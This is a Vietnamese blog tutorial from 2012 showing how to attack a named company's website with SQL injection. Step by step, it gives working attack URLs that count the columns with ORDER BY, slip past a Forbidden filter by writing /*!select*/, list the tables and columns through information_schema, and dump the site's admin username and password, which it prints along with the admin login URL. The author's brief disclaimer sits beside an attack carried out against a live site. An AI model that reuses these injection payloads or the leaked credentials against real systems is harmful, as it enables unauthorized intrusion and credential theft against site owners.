Hướng Dẫn hack Site lỗi 403 – 404 Forbidden.

Hướng Dẫn hack site lỗi 403 Forbidden.

Link site lỗi: http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=15
Thêm vào dấu ” ‘ ” phía sau đường link: Trang bị trắng, không có nội dung như bình thường. Chứng tỏ đường link bị lỗi


Bước 1
: Tìm Số Cột Có Trong Database

+) Tìm số côt có trong database: Theo cách bình thường:
http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=15 order by 500—
Web vẫn bình thường trong khi số cột quá lớn, chứng tỏ web bị lỗi ở đâu đó

+) Tìm số cột theo cách khác:
http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=15’ order by 50– –
Ah ha, Trang web đã xuất hiện lỗi trang tinh như lúc thêm vào dấu ‘, tiếp tục thử:

http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=15’ order by 10– –
Vẫn lỗi đó, tiếp tục thử,

http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=15’ order by 6– –
Ak, Trang web bình thường rồi, không còn bị lỗi nữa, chứng tỏ số cột có trong database nằm trong đoạn từ 6 đến 10, tiếp tục thử:

http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=15’ order by 7– –
Lại xuất hiện lỗi trang trắng, không có thông tin. Chứng tỏ số cột cần tìm là 7-1 =6.
Ok, tiếp tục khai thác

Bước 2: Exploit Tên Các tables

+) Tìm vị trí cột bị lỗi để khai thác:

http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=-15’ union /*!select*/ 1,2,3,4,5,6– –
Xuất hiện cột bị lỗi cần tìm rôi, chính là cột thứ 2.
* Lưu ý: – Phải có dấu “ ’ “ sau số 15
– Nếu khai thác bình thường:
http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=-15’ union select 1,2,3,4,5,6—

sẽ xuất hiện lỗi Forbidden như sau:

Forbidden
You don’t have permission to access /htmls/recruitment_detail.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
________________________________________
Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.vinaplast.com.vn Port 80

+) Cách khắc phục: thay select = /*!select*/
http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=15‘ union /*!select*/ 1,2,3,4,5,6– –

Ok, đã xuất hiện cột bị lỗi rồi nhé: 2

+) Exploit tên các bảng trong database:

http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=-15’ union /*!select*/ 1,concat_ws (0x3a,table_name),3,4,5,6 from information_schema./*!tables*/ where table_schema=database()– –

Ok!, Các table đã xuất hiện:

tbl_about tbl_admin tbl_area tbl_contact tbl_history_access tbl_investment tbl_keyword tbl_member

tbl_news tbl_product tbl_recruitment tbl_setmember

Ta chú ý đến table chứa username va pass là: tbl_admin, Và ta sẽ khai thác các cột chứa trong table này

Bước 3: Exploit tên các cột trong table tbl_admin

+) http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=-15‘ union /*!select*/ 1,concat_ws(0x3a,column_name),3,4,5,6 from information_schema./*!columns*/ where table_schema=database() and table_name=0x74626c5f61646d696e– –

* Lưu ý: – 74626c5f61646d696e chính là tbl_admin ở dạng hex
– Để đổi từ dạng chuỗi sang hex ta vào: http://www.string-functions.com/string-hex.aspx

Ok, đã xuât hiện tên các cột:

admin_id admin_username admin_password admin_first_name admin_last_name admin_email admin_phone admin_access

Ta chú ý đến cột: admin_username và admin_password để đăng nhập vào website, ta sẽ truy xuất thông tin của 2 cột này ra:

+) khai thác thông tin username và pass:

http://www.vinaplast.com.vn/htmls/recruitment_detail.php?id=-15‘ union /*!select*/ 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6 from tbl_admin– –

Tuyệt, đã xuât hiện username và password:

sunflower83:sunflower

Dấu : ngăn cách username và pass chính là 0x3a ở dạng hex

Bước 4: Tìm link đăng nhâp, có một số cáchm ở đây tôi sử dụng havij cho nhanh:

Và ta sẽ có link admin là: http://www.vinaplast.com.vn/admincp/

Tôi chỉ muốn trao đổi kiến thưc hacking với các bạn, không khuyến cáo các bạn đi phá hoại người khác.

By: ducdung.08clc

About securityforall

it, smile, share for people,...

Posted on May 7, 2012, in Hack SQL Injection. Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: